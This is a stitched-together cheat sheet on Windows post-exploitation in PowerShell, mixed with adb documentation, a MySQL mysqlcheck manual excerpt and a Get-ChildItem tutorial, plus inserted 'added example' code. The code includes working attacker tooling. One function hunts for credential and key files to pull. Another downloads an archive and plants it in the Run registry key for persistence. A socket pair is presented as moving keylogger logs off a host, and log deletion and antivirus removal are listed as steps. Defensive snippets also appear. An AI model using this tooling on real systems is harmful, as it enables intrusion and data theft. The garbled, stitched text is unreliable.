Windows Post Exploitation Cmdlets Execution (PowerShell)

Presence

This section focuses on information gathering about the victim host and the network that it’s attached to.

System


WMI

Networking

Users

Configs

Finding important files

Files to pull

Remote system access

Software

AutoStart directories
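The categories above are listed without commands on this page, so the following is an added example rather than the cheat sheet's own commands: one read-only sweep of the host that covers system and environment, network and remote-access surface, users, installed software and antivirus, autostart locations, and configuration or key files worth pulling. It uses only standard Windows PowerShell 5.1 cmdlets; the search roots and file-name patterns are assumptions, not values from the page.

```powershell
function Get-HostPresence {
    [CmdletBinding()]
    param(
        [string[]]$SearchRoots  = @("$env:SystemDrive\Users", "$env:SystemDrive\inetpub"),    # assumption
        [string[]]$FilePatterns = @('*.kdbx', '*.rdp', 'id_rsa', '*.pem', '*.pfx', 'web.config',
                                    'unattend.xml', 'sysprep.inf')                           # assumption
    )
    $os = Get-CimInstance Win32_OperatingSystem
    $cs = Get-CimInstance Win32_ComputerSystem
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()

    # System: what we are running on, as whom, how patched, and the environment block
    $system = [pscustomobject]@{
        Host           = $env:COMPUTERNAME
        Domain         = $cs.Domain
        PartOfDomain   = $cs.PartOfDomain
        OS             = "$($os.Caption) $($os.Version) $($os.OSArchitecture)"
        LastBoot       = $os.LastBootUpTime
        ConsoleUser    = $cs.UserName
        RunningAs      = $id.Name
        IsElevated     = ([System.Security.Principal.WindowsPrincipal]$id).IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
        RecentHotfixes = Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 5 -ExpandProperty HotFixID
        Environment    = Get-ChildItem Env: | Select-Object Name, Value
    }

    # Networking and remote-access surface (RDP is enabled when fDenyTSConnections is 0)
    $network = [pscustomobject]@{
        Addresses  = Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.IPAddress -notlike '127.*' } | Select-Object InterfaceAlias, IPAddress, PrefixLength
        Gateways   = Get-NetRoute -DestinationPrefix '0.0.0.0/0' -ErrorAction SilentlyContinue | Select-Object InterfaceAlias, NextHop
        Dns        = Get-DnsClientServerAddress -AddressFamily IPv4 | Where-Object ServerAddresses | Select-Object InterfaceAlias, ServerAddresses
        Listening  = Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
        Neighbors  = Get-NetNeighbor -AddressFamily IPv4 -State Reachable, Stale -ErrorAction SilentlyContinue | Select-Object IPAddress, LinkLayerAddress
        Shares     = Get-SmbShare -ErrorAction SilentlyContinue | Select-Object Name, Path
        RdpEnabled = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -ErrorAction SilentlyContinue).fDenyTSConnections -eq 0
        WinRM      = (Get-Service WinRM -ErrorAction SilentlyContinue).Status
    }

    # Users: local accounts, local administrators, interactive (2) and RDP (10) logon sessions
    $users = [pscustomobject]@{
        Local    = Get-LocalUser | Select-Object Name, Enabled, LastLogon, PasswordRequired
        Admins   = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue | Select-Object Name, ObjectClass, PrincipalSource
        Sessions = Get-CimInstance Win32_LogonSession -Filter 'LogonType = 2 OR LogonType = 10' | Select-Object LogonId, LogonType, StartTime
    }

    # Software: the Uninstall keys (64-bit, 32-bit, per-user) and any AV product registered with Security Center
    $uninstall = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
                 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
                 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    $software = [pscustomobject]@{
        Installed = Get-ItemProperty -Path $uninstall -ErrorAction SilentlyContinue | Where-Object DisplayName |
                    Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName -Unique
        Antivirus = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
                    Select-Object displayName, productState
    }

    # Autostart: Run/RunOnce keys, Startup folders, services set to start automatically
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    $autostart = @(foreach ($k in $runKeys) {
        (Get-ItemProperty -Path $k -ErrorAction SilentlyContinue).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' } |          # drop the PSPath/PSParentPath/... metadata
            ForEach-Object { [pscustomobject]@{ Source = $k; Name = $_.Name; Command = $_.Value } }
    })
    $startupDirs = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
                   "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    $autostart += @(Get-ChildItem -Path $startupDirs -File -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Source = $_.DirectoryName; Name = $_.Name; Command = $_.FullName } })
    $autoServices = Get-CimInstance Win32_Service -Filter "StartMode='Auto'" | Select-Object Name, StartName, PathName

    # Files worth pulling: configs and key material under the search roots
    $files = Get-ChildItem -Path $SearchRoots -Recurse -Include $FilePatterns -File -Force -ErrorAction SilentlyContinue |
             Select-Object FullName, Length, LastWriteTime

    [pscustomobject]@{ System = $system; Network = $network; Users = $users; Software = $software
                       Autostart = $autostart; AutoServices = $autoServices; Files = $files }
}

# Usage: $p = Get-HostPresence; $p.System; $p.Autostart | Format-Table -AutoSize; $p.Files
```

Everything here is a query; nothing is written to the host. Run it elevated if you want other users' logon sessions and the full Administrators membership; the -Include patterns only take effect together with -Recurse, which is why the search roots are directories rather than wildcards.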


Persistence

This section focuses on establishing a foothold so that access to the system can be regained later, through means such as stored credentials, backdoors and the like.

Download

Compress or expand ZIP archive

Reg command exit

Deleting logs

Uninstalling software (antivirus)

Invasive or altering commands
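An added example for the download, archive and registry items above (not the cheat sheet's own commands): stage a ZIP from a URL, expand it, and register it under the per-user Run key so it starts at the next logon. A second function shows what the same host gives a defender: the Run entries in both hives, and the event records that clearing a log leaves behind. The URL, staging directory, value name and file name are placeholders.

```powershell
function Install-RunKeyPersistence {
    param(
        [Parameter(Mandatory)][string]$Url,               # placeholder, e.g. https://staging.example.invalid/tools.zip
        [string]$StageDir = "$env:LOCALAPPDATA\Staging",  # placeholder staging folder
        [string]$KeyName  = 'Updater',                    # placeholder value name under ...\Run
        [string]$Exe      = 'tool.exe'                    # placeholder file name inside the archive
    )
    New-Item -ItemType Directory -Path $StageDir -Force | Out-Null
    $zip = Join-Path $StageDir 'payload.zip'

    # Download: -UseBasicParsing keeps Windows PowerShell 5.1 from loading the IE DOM parser
    Invoke-WebRequest -Uri $Url -OutFile $zip -UseBasicParsing

    # Expand the archive (Compress-Archive -Path <dir> -DestinationPath <zip> does the reverse for loot)
    Expand-Archive -Path $zip -DestinationPath $StageDir -Force
    Remove-Item -Path $zip

    # Per-user Run key: writable without elevation, executed at the user's next logon
    $runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    New-ItemProperty -Path $runKey -Name $KeyName -Value (Join-Path $StageDir $Exe) -PropertyType String -Force | Out-Null
    Get-ItemProperty -Path $runKey -Name $KeyName
}

function Get-PersistenceEvidence {
    # Defender side: every Run entry in both hives, with its source
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $entries = foreach ($k in $runKeys) {
        (Get-ItemProperty -Path $k -ErrorAction SilentlyContinue).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' } |
            ForEach-Object { [pscustomobject]@{ Hive = $k; Name = $_.Name; Command = $_.Value } }
    }
    # Clearing a log is itself logged: 1102 in Security (Security log cleared),
    # 104 in System (System or Application log cleared). Reading Security needs elevation.
    $cleared = @(
        Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102 } -MaxEvents 10 -ErrorAction SilentlyContinue
        Get-WinEvent -FilterHashtable @{ LogName = 'System';   Id = 104  } -MaxEvents 10 -ErrorAction SilentlyContinue
    ) | Select-Object TimeCreated, LogName, Id, @{ n = 'User'; e = { $_.UserId } }
    [pscustomobject]@{ RunEntries = $entries; LogClearEvents = $cleared }
}

# Usage:
#   Install-RunKeyPersistence -Url 'https://staging.example.invalid/tools.zip'   # placeholder URL
#   Get-PersistenceEvidence | Format-List
```

The point of pairing the two functions is the caveat for the "Deleting logs" item: wiping the Security log does not remove the trace, it writes event 1102, so the defender-side function will still show the clear and the account that did it.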

ADB Shell Commands

The Android Debug Bridge (adb) provides a Unix shell that you can use to run a variety of commands on an emulator or connected device.

Reference: http://developer.android.com/intl/es/tools/help/shell.html

Issuing Shell Commands

You can use the shell command to issue commands, with or without entering the adb remote shell on the emulator/device. To issue a single command without entering a remote shell, use the shell command like this:

 

List all attached devices

 

Download a specified file from a device to your computer

 

Upload a specified file from your computer to a device

 

List directory contents

 

Change directory

 

Remove files or directories

 

Make directories

 

Create empty file

 

Current working directory location

 

Copy files and directories

 

Move or rename files

 

Starts (restarts) an emulator/device instance

 

Stops execution of an emulator/device instance

 

Prints kernel debugging messages to the screen

 

Show/manipulate routing, devices, policy routing and tunnels

 

Network statistics

 

Network connection tool

 

Test the connection and latency between two network endpoints

 

Using activity manager (am)

Within an adb shell, you can issue commands with the activity manager (am) tool to perform various system actions, such as starting an activity, force-stopping a process, broadcasting an intent, modifying the device screen properties, and more. While in a shell, the syntax is:

Available activity manager commands:

Start an Activity specified by <INTENT>.

Start the Service specified by <INTENT>.

Kill all processes associated with <PACKAGE>

 

Using package manager (pm)

Within an adb shell, you can issue commands with the package manager (pm) tool to perform actions and queries on application packages installed on the device. While in a shell, the syntax is:

Available package manager commands:

Prints all packages, optionally only those whose package name contains the text in <FILTER>.

Prints all known permission groups

Prints all known permissions, optionally only those in <GROUP>

Prints all features of the system

Prints all users on the system

Installs a package (specified by <PATH>) to the system

 

Taking a device screenshot

The screencap command is a shell utility for taking a screenshot of a device display. While in a shell, the syntax is:

 

Recording a device screen

The screenrecord command is a shell utility for recording the display of devices running Android 4.4 (API level 19) and higher. The utility records screen activity to an MPEG-4 file.

 

List of all the available shell programs

 

More commands
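The adb command lines themselves are not reproduced on this page, so here is an added example (not from the Android documentation) of driving adb.exe from PowerShell: enumerate every attached device from `adb devices -l`, run one-shot `adb -s <serial> shell <command>` calls without entering the interactive shell, list third-party packages with `pm`, and take a screenshot with `screencap` followed by `adb pull`. It assumes the Android platform-tools directory is on PATH and that the devices have already authorized this computer.

```powershell
function Get-AdbDevices {
    # `adb devices -l` prints a header line, then one "<serial> <state> key:value ..." line per device.
    # State is "device" when usable, "unauthorized" until the phone accepts the RSA prompt, or "offline".
    adb devices -l | Select-Object -Skip 1 | Where-Object { $_ -match '^\S+\s+\S+' } | ForEach-Object {
        $parts = $_ -split '\s+'
        $props = @{}
        foreach ($kv in ($parts | Select-Object -Skip 2)) {
            $k, $v = $kv -split ':', 2
            if ($v) { $props[$k] = $v }
        }
        [pscustomobject]@{ Serial = $parts[0]; State = $parts[1]; Model = $props['model']; TransportId = $props['transport_id'] }
    }
}

function Invoke-AdbShell {
    param([Parameter(Mandatory)][string]$Serial, [Parameter(Mandatory)][string]$Command)
    # One-shot form: the command runs on the device and adb exits; no interactive shell is opened.
    # -s pins the target so a second emulator or phone cannot receive the command by accident.
    $out = & adb -s $Serial shell $Command 2>&1
    if ($LASTEXITCODE -ne 0) { throw "adb shell '$Command' failed ($LASTEXITCODE): $out" }
    $out
}

function Get-AdbThirdPartyPackages {
    param([Parameter(Mandatory)][string]$Serial)
    # pm list packages -3  => "package:com.example.app" (user-installed only)
    # pm path <pkg>        => "package:/data/app/.../base.apk" (one line per split APK)
    Invoke-AdbShell -Serial $Serial -Command 'pm list packages -3' | ForEach-Object {
        $pkg = ($_ -replace '^package:', '').Trim()
        $apk = @(Invoke-AdbShell -Serial $Serial -Command "pm path $pkg") -replace '^package:', ''
        [pscustomobject]@{ Package = $pkg; Apk = ($apk -join ';') }
    }
}

function Save-AdbScreenshot {
    param([Parameter(Mandatory)][string]$Serial, [string]$LocalPath = ".\${Serial}-screen.png")
    $remote = '/sdcard/adb-screen.png'                       # scratch path on the device
    Invoke-AdbShell -Serial $Serial -Command "screencap -p $remote" | Out-Null
    & adb -s $Serial pull $remote $LocalPath | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "adb pull failed ($LASTEXITCODE)" }
    Invoke-AdbShell -Serial $Serial -Command "rm $remote" | Out-Null
    Get-Item -Path $LocalPath
}

# Usage: walk every usable device, print its Android release, its third-party apps, and grab a screenshot
foreach ($d in (Get-AdbDevices | Where-Object State -eq 'device')) {
    "== $($d.Serial) ($($d.Model))"
    Invoke-AdbShell -Serial $d.Serial -Command 'getprop ro.build.version.release'
    Get-AdbThirdPartyPackages -Serial $d.Serial | Format-Table -AutoSize
    Save-AdbScreenshot -Serial $d.Serial
}
```

The `start`, `stop` and `dmesg` items listed above need a rooted device or emulator; on a production handset `adb shell stop` is refused, so check `Invoke-AdbShell -Serial $s -Command id` first if a command unexpectedly fails.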

 

Moving an object in JavaScript using the keyboard

Developer tool: console

 

Computer Security with PowerShell

Introduction

  • Confidentiality

  • Integrity

  • Availability

  • Authentication

  • Non-repudiation

Physical security

  • Inventory the hardware of the company's machines

  • List connected devices (phones, USB storage, etc.)


Logical security

  • View information about users and groups (the logged-on user)

  • Create users and groups (creation procedure)

  • Inventory the software on the company's machines

  • Analyze the programs installed on the company's machines and how they relate to processes and services (threads can be analyzed too)

  • View the updates installed on the system

  • Running processes

  • Executable path of each process

  • Processes and users

  • Processes and network connections

UDP

TCP

  • Services and network connections

UDP

TCP
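The four items above (processes and users, process path, processes and network connections, services and network connections) are one join, so here is an added example (not from the outline) that produces a single table: each TCP connection or UDP endpoint with its owning process, the user it runs as, its executable path, and any services hosted in that process. Run it elevated; -IncludeUserName and other users' process paths are only visible to an administrator. The list of "trusted" directories used to flag unusual binaries is an assumption.

```powershell
function Get-NetworkOwners {
    [CmdletBinding()]
    param([switch]$IncludeUdp)

    # Lookup tables keyed by PID (as a string so hashtable lookups never mix int and uint32)
    $procs = @{}
    Get-Process -IncludeUserName -ErrorAction SilentlyContinue | ForEach-Object { $procs["$($_.Id)"] = $_ }

    # Win32_Service carries the PID of the process hosting each running service (svchost groups several)
    $svcs = @{}
    Get-CimInstance Win32_Service -Filter 'ProcessId <> 0' | ForEach-Object {
        $k = "$($_.ProcessId)"
        if (-not $svcs.ContainsKey($k)) { $svcs[$k] = New-Object System.Collections.Generic.List[string] }
        $svcs[$k].Add($_.Name)
    }

    # Assumption: binaries outside these roots are worth a second look when they hold a socket
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

    function New-Row($proto, $local, $lport, $remote, $rport, $state, $ownerPid) {
        $p    = $procs["$ownerPid"]
        $path = if ($p) { $p.Path } else { $null }
        $inTrusted = $false
        foreach ($t in $trusted) {
            if ($path -and $path.StartsWith($t, [System.StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
        }
        [pscustomobject]@{
            Proto    = $proto
            Local    = "${local}:${lport}"
            Remote   = if ($state -eq 'Listen' -or -not $remote) { '' } else { "${remote}:${rport}" }
            State    = "$state"
            PID      = $ownerPid
            Process  = if ($p) { $p.ProcessName } else { '(not visible)' }
            User     = if ($p) { $p.UserName } else { '' }
            Path     = $path
            Services = if ($svcs.ContainsKey("$ownerPid")) { $svcs["$ownerPid"] -join ',' } else { '' }
            Unusual  = [bool]($path -and -not $inTrusted)
        }
    }

    $rows = @(Get-NetTCPConnection -State Listen, Established | ForEach-Object {
        New-Row 'TCP' $_.LocalAddress $_.LocalPort $_.RemoteAddress $_.RemotePort $_.State $_.OwningProcess
    })
    if ($IncludeUdp) {
        # UDP has no state; every bound endpoint is reported as 'Bound'
        $rows += @(Get-NetUDPEndpoint | ForEach-Object {
            New-Row 'UDP' $_.LocalAddress $_.LocalPort $null $null 'Bound' $_.OwningProcess
        })
    }
    $rows | Sort-Object Proto, State, Process
}

# Usage: Get-NetworkOwners -IncludeUdp | Where-Object Unusual | Format-Table -AutoSize
```

A PID with an empty Process column means the socket belongs to a process this session cannot open (typically another user's, or a protected system process), which is itself a useful signal when you are not elevated.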

 


Antivirus

  • Scan

  • Definitions


Backups

  • Create and restore backups


Network

  • Scan hosts

  • Monitor

  • Logs


Cryptography

  • Encrypt and decrypt

Encrypt

Decrypt


Forensics

  • Analyze the file system (paths, dates, etc.)

  • Artifacts

  • Create a memory dump file of a process


Pentesting

  • Brute force

Artifacts

Making TCP/UDP connections with PowerShell

TCP (Transmission Control Protocol)

UDP (User Datagram Protocol)

Transferring a keylogger log file between server and client (TCP sockets)

Server


Client
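The server and client code is not reproduced on this page, so the following is an added example (not the page's own) covering both the TCP/UDP item and the file transfer: a TcpListener receiver that writes one file, a TcpClient sender, and a UdpClient probe to show the connectionless contrast. The file name and ports are placeholders. The transfer is plaintext; anything that crosses a network you do not control belongs inside System.Net.Security.SslStream or an existing tunnel.

```powershell
function Receive-FileOverTcp {
    param(
        [int]$Port = 9001,                              # placeholder
        [string]$OutFile = "$env:TEMP\received.log",    # placeholder
        [string]$BindAddress = '127.0.0.1'              # loopback by default; widen deliberately
    )
    $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Parse($BindAddress), $Port)
    $listener.Start()
    try {
        $client = $listener.AcceptTcpClient()
        $stream = $client.GetStream()
        try {
            # Framing: 8-byte little-endian length, then the payload. Without a length the
            # receiver cannot tell a complete short file from a connection cut mid-transfer.
            $hdr = New-Object byte[] 8
            $got = 0
            while ($got -lt 8) {
                $n = $stream.Read($hdr, $got, 8 - $got)
                if ($n -le 0) { throw 'peer closed before sending the length header' }
                $got += $n
            }
            $expected = [System.BitConverter]::ToInt64($hdr, 0)
            $fs = [System.IO.File]::Create($OutFile)
            try {
                $buf = New-Object byte[] 65536
                $remaining = $expected
                while ($remaining -gt 0) {
                    $n = $stream.Read($buf, 0, [int][Math]::Min($buf.Length, $remaining))
                    if ($n -le 0) { throw "connection closed with $remaining bytes outstanding" }
                    $fs.Write($buf, 0, $n)
                    $remaining -= $n
                }
            } finally { $fs.Dispose() }
            [pscustomobject]@{ File = $OutFile; Bytes = $expected; From = $client.Client.RemoteEndPoint.ToString() }
        } finally { $client.Dispose() }
    } finally { $listener.Stop() }
}

function Send-FileOverTcp {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$Server = '127.0.0.1',
        [int]$Port = 9001
    )
    $bytes  = [System.IO.File]::ReadAllBytes($Path)
    $client = [System.Net.Sockets.TcpClient]::new($Server, $Port)
    try {
        $stream = $client.GetStream()
        $stream.Write([System.BitConverter]::GetBytes([int64]$bytes.Length), 0, 8)   # length prefix
        $stream.Write($bytes, 0, $bytes.Length)
        $stream.Flush()
    } finally { $client.Dispose() }
    $bytes.Length
}

function Send-UdpProbe {
    param([string]$Server = '127.0.0.1', [int]$Port = 9002, [string]$Message = 'ping', [int]$TimeoutMs = 2000)
    $udp = [System.Net.Sockets.UdpClient]::new()
    try {
        $udp.Client.ReceiveTimeout = $TimeoutMs
        $payload = [System.Text.Encoding]::UTF8.GetBytes($Message)
        [void]$udp.Send($payload, $payload.Length, $Server, $Port)
        # No connection and no delivery guarantee: a timeout means "no answer", not "port closed"
        $from = [System.Net.IPEndPoint]::new([System.Net.IPAddress]::Any, 0)
        try { [System.Text.Encoding]::UTF8.GetString($udp.Receive([ref]$from)) } catch { $null }
    } finally { $udp.Dispose() }
}

# Usage (two PowerShell windows):
#   receiver:  Receive-FileOverTcp -OutFile "$env:TEMP\keys.log"     # blocks until one client connects
#   sender:    Send-FileOverTcp -Path .\keylog.txt                   # placeholder file name
```

The receiver loops on Read until the announced byte count arrives because a single Read on a NetworkStream returns whatever has been buffered so far, not the whole message; treating one Read as "the file" is the usual bug in quick socket scripts.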

 

mysqlcheck: A Table Maintenance Program

The mysqlcheck client performs table maintenance: It checks, repairs, optimizes, or analyzes tables.

Each table is locked and therefore unavailable to other sessions while it is being processed, although for check operations, the table is locked with a READ lock only (see Section 13.3.5, “LOCK TABLES and UNLOCK TABLES Syntax”, for more information about READ and WRITE locks). Table maintenance operations can be time-consuming, particularly for large tables. If you use the --databases or --all-databases option to process all tables in one or more databases, an invocation of mysqlcheck might take a long time. (This is also true for mysql_upgrade because that program invokes mysqlcheck to check all tables and repair them if necessary.)

mysqlcheck is similar in function to myisamchk, but works differently. The main operational difference is that mysqlcheck must be used when the mysqld server is running, whereas myisamchk should be used when it is not. The benefit of using mysqlcheck is that you do not have to stop the server to perform table maintenance.

mysqlcheck uses the SQL statements CHECK TABLE, REPAIR TABLE, ANALYZE TABLE, and OPTIMIZE TABLE in a convenient way for the user. It determines which statements to use for the operation you want to perform, and then sends the statements to the server to be executed. For details about which storage engines each statement works with, see the descriptions for those statements in Section 13.7.2, “Table Maintenance Statements”.

The MyISAM storage engine supports all four maintenance operations, so mysqlcheck can be used to perform any of them on MyISAM tables. Other storage engines do not necessarily support all operations. In such cases, an error message is displayed. For example, if test.t is a MEMORY table, an attempt to check it produces this result:

If mysqlcheck is unable to repair a table, see Section 2.19.4, “Rebuilding or Repairing Tables or Indexes” for manual table repair strategies. This will be the case, for example, for InnoDB tables, which can be checked with CHECK TABLE, but not repaired with REPAIR TABLE.

Caution

It is best to make a backup of a table before performing a table repair operation; under some circumstances the operation might cause data loss. Possible causes include but are not limited to file system errors.

There are three general ways to invoke mysqlcheck:

If you do not name any tables following db_name or if you use the --databases or --all-databases option, entire databases are checked.

mysqlcheck has a special feature compared to other client programs. The default behavior of checking tables (--check) can be changed by renaming the binary. If you want to have a tool that repairs tables by default, you should just make a copy of mysqlcheck named mysqlrepair, or make a symbolic link to mysqlcheck named mysqlrepair. If you invoke mysqlrepair, it repairs tables.

The names shown in the following table can be used to change mysqlcheck default behavior.

Command Meaning
mysqlrepair The default option is --repair
mysqlanalyze The default option is --analyze
mysqloptimize The default option is --optimize

mysqlcheck supports the following options, which can be specified on the command line or in the [mysqlcheck] and [client] groups of an option file. For information about option files used by MySQL programs, see Section 4.2.6, “Using Option Files”.

Table 4.4 mysqlcheck Options

Format  Description  Introduced
--all-databases  Check all tables in all databases
--all-in-1  Execute a single statement for each database that names all the tables from that database
--analyze  Analyze the tables
--auto-repair  If a checked table is corrupted, automatically fix it
--character-sets-dir=path  Directory where character sets are installed
--check  Check the tables for errors
--check-only-changed  Check only tables that have changed since the last check
--check-upgrade  Invoke CHECK TABLE with the FOR UPGRADE option  5.0.19
--compress  Compress all information sent between client and server
--databases  Process all tables in the named databases
--debug[=debug_options]  Write a debugging log
--default-character-set=charset_name  Specify default character set
--defaults-extra-file=file_name  Read option file in addition to usual option files
--defaults-file=file_name  Read only named option file
--defaults-group-suffix=str  Option group suffix value  5.0.10
--extended  Check and repair tables
--fast  Check only tables that have not been closed properly
--force  Continue even if an SQL error occurs
--help  Display help message and exit
--host=host_name  Connect to MySQL server on given host
--medium-check  Do a check that is faster than an --extended operation
--no-defaults  Read no option files
--optimize  Optimize the tables
--password[=password]  Password to use when connecting to server
--pipe  On Windows, connect to server using named pipe
--port=port_num  TCP/IP port number to use for connection
--print-defaults  Print defaults
--protocol=type  Connection protocol to use
--quick  The fastest method of checking
--repair  Perform a repair that can fix almost anything except unique keys that are not unique
--shared-memory-base-name=name  The name of shared memory to use for shared-memory connections
--silent  Silent mode
--socket=path  For connections to localhost, the Unix socket file to use
--ssl  Enable SSL for connection
--ssl-ca=file_name  Path of file that contains list of trusted SSL CAs
--ssl-capath=dir_name  Path of directory that contains trusted SSL CA certificates in PEM format
--ssl-cert=file_name  Path of file that contains X509 certificate in PEM format
--ssl-cipher=cipher_list  List of permitted ciphers to use for SSL encryption
--ssl-key=file_name  Path of file that contains X509 key in PEM format
--ssl-verify-server-cert  Verify server Common Name value in its certificate against host name used when connecting to server  5.0.23
--tables  Overrides the --databases or -B option
--use-frm  For repair operations on MyISAM tables
--user=user_name  MySQL user name to use when connecting to server
--verbose  Verbose mode
--version  Display version information and exit
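Two rows in that table matter more than the rest from a security standpoint: --password[=password], which puts the secret into a command line any local user can read from the process list, and --ssl-verify-server-cert, without which --ssl encrypts the session but accepts any certificate the far end presents. The following is an added example (not from the MySQL manual) of running mysqlcheck from PowerShell on Windows the safe way: credentials go into a temporary option file that only the current account can read and is passed with --defaults-extra-file, the server certificate is pinned to a CA bundle and verified against the host name, and the report is parsed into objects so failing tables can be acted on. It assumes a 5.0/5.1/5.5-era mysqlcheck.exe (the --ssl flags listed above) on PATH; the host, user and CA path are placeholders, and the output format the parser expects is taken from the manual's examples.

```powershell
function Invoke-MysqlCheck {
    param(
        [string]$MysqlHost = 'db.example.invalid',              # placeholder
        [string]$User      = 'maint',                           # placeholder
        [Parameter(Mandatory)][securestring]$Password,
        [string]$CaFile    = 'C:\ProgramData\MySQL\ca.pem',     # placeholder path to the CA bundle
        [string[]]$Databases,                                   # empty => --all-databases
        [switch]$AutoRepair
    )

    # 1. Credentials go in an option file, never on the command line. %TEMP% is already
    #    per-user; the ACL below additionally strips every inherited rule.
    $optFile = Join-Path $env:TEMP ("mysqlcheck-{0}.cnf" -f [guid]::NewGuid())
    $plain   = [System.Net.NetworkCredential]::new('', $Password).Password
    $lines   = '[client]', "user=$User", "password=`"$plain`"", "host=$MysqlHost"   # quoted: '#' and ';' start comments
    [System.IO.File]::WriteAllText($optFile, ($lines -join "`n") + "`n", [System.Text.UTF8Encoding]::new($false))
    $plain = $null

    $acl = Get-Acl -Path $optFile
    $acl.SetAccessRuleProtection($true, $false)                 # stop inheriting from %TEMP%
    foreach ($rule in $acl.Access) { [void]$acl.RemoveAccessRule($rule) }
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new($me, 'FullControl', 'Allow'))
    Set-Acl -Path $optFile -AclObject $acl

    try {
        # --defaults-extra-file must come first. --ssl-verify-server-cert makes the client check the
        # certificate's CN against $MysqlHost instead of accepting whatever the server presents.
        $cliArgs = @("--defaults-extra-file=$optFile", '--ssl', "--ssl-ca=$CaFile", '--ssl-verify-server-cert', '--check')
        if ($AutoRepair) { $cliArgs += '--auto-repair' }
        if ($Databases)  { $cliArgs += '--databases'; $cliArgs += $Databases } else { $cliArgs += '--all-databases' }
        $output = & mysqlcheck @cliArgs 2>&1
        $exit   = $LASTEXITCODE
    } finally {
        Remove-Item -Path $optFile -Force -ErrorAction SilentlyContinue
    }

    # 2. Parse the report. Assumed format, as in the manual's examples: a clean table prints
    #    "db.tbl    OK" on one line; a problem table prints "db.tbl" alone, followed by
    #    "error    : ...", "warning  : ...", "note     : ..." or "status   : ..." lines.
    $tables  = New-Object System.Collections.Generic.List[object]
    $current = $null
    foreach ($raw in $output) {
        $line = "$raw".TrimEnd()
        if ($line -match '^(\S+\.\S+)\s+OK$') {
            $tables.Add([pscustomobject]@{ Table = $Matches[1]; Status = 'OK'; Messages = @() }); $current = $null
        } elseif ($line -match '^(\S+\.\S+)$') {
            $current = [pscustomobject]@{ Table = $Matches[1]; Status = 'ATTENTION'; Messages = @() }; $tables.Add($current)
        } elseif ($current -and $line -match '^(\w+)\s*:\s*(.*)$') {
            $current.Messages += "$($Matches[1]): $($Matches[2])"
            if ($Matches[1] -eq 'status' -and $Matches[2] -eq 'OK') { $current.Status = 'OK' }
        }
    }
    [pscustomobject]@{
        ExitCode       = $exit
        Tables         = $tables
        NeedsAttention = @($tables | Where-Object { $_.Status -ne 'OK' })
    }
}

# Usage: Invoke-MysqlCheck -Databases shop, crm -Password (Read-Host -AsSecureString 'MySQL password')
```

Take the manual's own caution seriously before adding -AutoRepair: run the check first, look at NeedsAttention, back up those tables, and only then repeat with repair enabled.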

Replicating (and Extending) the DIR Command

In its basic form the Get-ChildItem cmdlet provides functionality similar to the dir command. For example, if you simply type Get-ChildItem at the Windows PowerShell prompt you’ll get back information about the objects in the current location:

 
That’s all well and good, but you can do a lot more with Get-ChildItem than simply list the items found in the current location. For example, in the output above you might have noticed that there wasn’t much to look at; that’s because the current location happened to be a folder that contained only a handful of subfolders. Because of that you might have found it a bit more useful if Get-ChildItem had returned not only the names of those subfolders but also the contents of those subfolders; that is, you might want a list of all the files and folders in the subfolders. No problem; just add the -recurse parameter:

 
Of course, you aren’t limited to working with only the current location; in fact, you aren’t limited to working with just files and folders. Would you like to see a list of all your environment variables? Then simply pass along the path to the environment variable “drive,” like so:

 
What about all the registry subkeys found in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall? Why not:

 
Note. Get-ChildItem cannot be used to retrieve information about the registry values contained within a subkey. For that you need to use the Get-ItemProperty cmdlet.
We could do this all day. For example, the -include and -exclude parameters make it easy to retrieve a specific set of items from a location. Suppose you want information about only the .txt and .log files found in the folder C:\Scripts? That’s easy:

 
As you can see, we ask for all the files (*.*) found in the folder C:\Scripts, then tack on the -include parameter with two file types, *.txt and *.log, separated by a comma. What do we get back? Only .txt and .log files:

 
If we wanted to get back everything except .txt and .log files then we’d simply use the -exclude parameter instead; this parameter tells Windows PowerShell which items should not be included in the returned dataset. Here’s what the command looks like:

 
Give it a try and see what happens.
The information returned by Get-ChildItem can also be piped into the Sort-Object cmdlet, providing a way to sort the data in some order other than by name. Would you rather see files sorted by size (length) than by name? Then use this command:

 
Or, if you’d rather see the largest files listed first and the smallest files listed last, then add the -descending parameter:
